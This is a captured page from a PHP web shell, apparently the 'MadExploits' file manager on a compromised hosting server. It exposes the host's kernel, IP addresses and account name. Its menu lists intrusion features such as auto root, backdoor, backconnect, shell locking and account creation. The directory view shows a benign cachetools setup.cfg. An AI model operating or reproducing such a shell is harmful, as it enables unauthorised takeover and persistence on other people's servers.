Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
cachetools /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitignore
98
B
-rw-r--r--
.readthedocs.yaml
135
B
-rw-r--r--
CHANGELOG.rst
9.63
KB
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
MANIFEST.in
193
B
-rw-r--r--
README.rst
4.24
KB
-rw-r--r--
pyproject.toml
100
B
-rw-r--r--
setup.cfg
1.31
KB
-rw-r--r--
setup.py
38
B
-rw-r--r--
tox.ini
850
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.cfg
[metadata] name = cachetools version = attr: cachetools.__version__ url = https://github.com/tkem/cachetools/ author = Thomas Kemmer author_email = tkemmer@computer.org license = MIT license_files = LICENSE description = Extensible memoizing collections and decorators long_description = file: README.rst classifiers = Development Status :: 5 - Production/Stable Environment :: Other Environment Intended Audience :: Developers License :: OSI Approved :: MIT License Operating System :: OS Independent Programming Language :: Python Programming Language :: Python :: 3 Programming Language :: Python :: 3.7 Programming Language :: Python :: 3.8 Programming Language :: Python :: 3.9 Programming Language :: Python :: 3.10 Programming Language :: Python :: 3.11 Programming Language :: Python :: 3.12 Programming Language :: Python :: 3.13 Topic :: Software Development :: Libraries :: Python Modules [options] package_dir = = src packages = find: python_requires = >= 3.7 [options.packages.find] where = src [flake8] max-line-length = 80 exclude = .git, .tox, build select = C, E, F, W, B, B950, I, N # F401: imported but unused (submodule shims) # E501: line too long (black) ignore = F401, E501 [build_sphinx] source-dir = docs/ build-dir = docs/_build all_files = 1
Close